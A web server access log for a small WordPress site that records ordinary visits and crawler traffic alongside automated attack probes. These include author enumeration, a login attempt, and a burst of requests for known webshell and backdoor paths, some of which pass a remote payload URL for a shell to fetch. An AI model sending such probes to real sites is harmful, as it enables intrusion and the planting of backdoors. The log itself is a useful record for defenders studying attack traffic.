95.25.134.74 - - [14/Oct/2022:02:34:41 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
95.25.134.74 - - [14/Oct/2022:02:34:41 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
10.213.116.211 - - [14/Oct/2022:02:34:49 -0700] "POST /wp-cron.php?doing_wp_cron=1665740089.5983829498291015625000 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665740089.5983829498291015625000" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
95.25.134.74 - - [14/Oct/2022:02:34:55 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
20.198.105.190 - - [14/Oct/2022:02:35:14 -0700] "GET /wp-login.php HTTP/1.1" 200 7984 "-" "Mozilla/5.0" "gatipackers.com"
20.198.105.190 - - [14/Oct/2022:02:35:17 -0700] "GET /?author=1 HTTP/1.1" 200 14254 "-" "Mozilla/5.0" "gatipackers.com"
20.198.105.190 - - [14/Oct/2022:02:35:20 -0700] "GET /?author=2 HTTP/1.1" 404 9044 "-" "Mozilla/5.0" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:51 -0700] "GET / HTTP/1.1" 200 14585 "-" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.6.9 HTTP/1.1" 200 741 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.9 HTTP/1.1" 200 7849 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-content/themes/twentynineteen/style.css?ver=1.1 HTTP/1.1" 200 19371 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1" 200 765 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-content/themes/twentynineteen/print.css?ver=1.1 HTTP/1.1" 200 1230 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:41:59 -0700] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.9 HTTP/1.1" 200 4662 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
205.254.166.160 - - [14/Oct/2022:02:42:00 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "http://www.gatipackers.com/" "Mozilla/5.0 (Linux; Android 10; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.gatipackers.com"
10.213.116.211 - - [14/Oct/2022:02:41:56 -0700] "POST /wp-cron.php?doing_wp_cron=1665740516.5020430088043212890625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665740516.5020430088043212890625" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
17.121.114.201 - - [14/Oct/2022:02:52:18 -0700] "GET / HTTP/1.1" 200 14585 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "www.gatipackers.com"
17.121.115.213 - - [14/Oct/2022:02:52:22 -0700] "GET / HTTP/1.1" 200 14585 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "www.gatipackers.com"
10.213.116.211 - - [14/Oct/2022:02:52:26 -0700] "POST /wp-cron.php?doing_wp_cron=1665741146.4657969474792480468750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665741146.4657969474792480468750" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
5.188.62.26 - - [14/Oct/2022:02:52:44 -0700] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 7986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4895.86 Safari/537.36" "gatipackers.com"
5.188.62.26 - - [14/Oct/2022:02:52:53 -0700] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 200 8250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4895.86 Safari/537.36" "gatipackers.com"
82.118.29.238 - - [14/Oct/2022:02:57:43 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
82.118.29.238 - - [14/Oct/2022:02:57:44 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
82.118.29.238 - - [14/Oct/2022:02:57:49 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
72.255.9.84 - - [14/Oct/2022:03:03:09 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "gatipackers.com"
72.255.9.84 - - [14/Oct/2022:03:03:15 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "gatipackers.com"
72.255.9.84 - - [14/Oct/2022:03:03:24 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "gatipackers.com"
185.231.244.195 - - [14/Oct/2022:03:13:55 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
185.231.244.195 - - [14/Oct/2022:03:13:55 -0700] "GET / HTTP/1.1" 200 14528 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
10.213.116.211 - - [14/Oct/2022:03:14:01 -0700] "POST /wp-cron.php?doing_wp_cron=1665742441.0385839939117431640625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665742441.0385839939117431640625" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
185.231.244.195 - - [14/Oct/2022:03:14:03 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13879 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
114.119.134.212 - - [14/Oct/2022:03:14:53 -0700] "GET /?ref=w3use HTTP/1.1" 200 14528 "http://gatipackers.com?ref=w3use" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
168.138.24.183 - - [14/Oct/2022:03:27:14 -0700] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 73 "-" "-" "www.gatipackers.com"
168.138.24.183 - - [14/Oct/2022:03:27:14 -0700] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 73 "-" "-" "www.gatipackers.com"
114.119.145.239 - - [14/Oct/2022:03:32:47 -0700] "GET /in8 HTTP/1.1" 301 1409 "https://gatipackers.com?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
114.119.145.239 - - [14/Oct/2022:03:32:53 -0700] "GET /in8/ HTTP/1.1" 200 3460 "https://gatipackers.com?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:05 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Go-http-client/1.1" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:06 -0700] "GET / HTTP/1.1" 200 14528 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
10.213.116.209 - - [14/Oct/2022:04:14:11 -0700] "POST /wp-cron.php?doing_wp_cron=1665746051.5666389465332031250000 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665746051.5666389465332031250000" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:32 -0700] "GET /wp-admin HTTP/1.1" 301 1408 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:34 -0700] "GET /wp-admin/ HTTP/1.1" 302 - "http://gatipackers.com/wp-admin" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:39 -0700] "GET /wp-login.php HTTP/1.1" 200 7983 "http://gatipackers.com/wp-admin/" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:42 -0700] "GET /wp-login.php HTTP/1.1" 200 7980 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:14:48 -0700] "GET /index.php/2021/02 HTTP/1.1" 200 13931 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:15:01 -0700] "GET /index.php/2021/02/26/sample-page HTTP/1.1" 200 13879 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:15:26 -0700] "GET /index.php/2021/02/26/hello-world HTTP/1.1" 200 15814 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:15:38 -0700] "GET /index.php/author/administrator HTTP/1.1" 200 14254 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:18:20 -0700] "GET /index.php/feed HTTP/1.1" 200 3746 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:18:27 -0700] "GET /index.php/comments/feed HTTP/1.1" 200 957 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
35.210.149.90 - - [14/Oct/2022:04:18:32 -0700] "GET /index.php/category/uncategorized HTTP/1.1" 200 11811 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:18 -0700] "GET /style.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:18 -0700] "GET /moduless.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:18 -0700] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:19 -0700] "GET /admin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:19 -0700] "GET /index.php?3x=3x HTTP/1.1" 200 14528 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:26 -0700] "GET /boom.php?x HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:26 -0700] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:27 -0700] "GET /wp-content/db_cache.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:27 -0700] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [14/Oct/2022:04:58:24 -0700] "POST /wp-cron.php?doing_wp_cron=1665748704.1758759021759033203125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1665748704.1758759021759033203125" "WordPress/5.6.9; http://gatipackers.com" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:28 -0700] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:28 -0700] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:29 -0700] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:29 -0700] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:30 -0700] "GET /alfindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:30 -0700] "GET /alfa.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:30 -0700] "GET /wp-booking.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:31 -0700] "GET /cindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:31 -0700] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:32 -0700] "GET /wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:33 -0700] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:33 -0700] "GET /wp-includes/css/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:34 -0700] "GET /old-index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:35 -0700] "GET /config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:35 -0700] "GET /wp-admin/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:35 -0700] "GET /wp-content/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:36 -0700] "GET /wp-includes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:36 -0700] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:36 -0700] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:37 -0700] "POST /wp-includes/css/wp-config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:38 -0700] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:38 -0700] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:38 -0700] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:39 -0700] "GET /haders.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:39 -0700] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:39 -0700] "GET /legion.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:40 -0700] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:40 -0700] "GET /wp-includes/lfx.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:41 -0700] "GET /wp-includes/small.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:41 -0700] "GET /up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:41 -0700] "GET /upload.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:42 -0700] "GET /config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:42 -0700] "GET /test.php?Ghost=send HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:42 -0700] "GET /wp-content/langar.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:43 -0700] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:43 -0700] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.25.176.210 - - [14/Oct/2022:04:58:44 -0700] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
114.119.145.249 - - [14/Oct/2022:05:06:37 -0700] "GET /wp-content?C=M%3BO%3DA HTTP/1.1" 301 1428 "https://www.gatipackers.com/wp-content?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
